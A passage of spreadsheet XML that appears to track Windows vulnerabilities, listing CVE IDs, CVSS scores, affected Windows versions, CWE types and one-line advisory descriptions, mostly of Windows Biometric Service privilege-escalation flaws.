          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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0" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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1" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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2" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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3" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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4" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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5" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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6" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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7" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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8" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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09" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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0" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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1" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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2" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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3" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
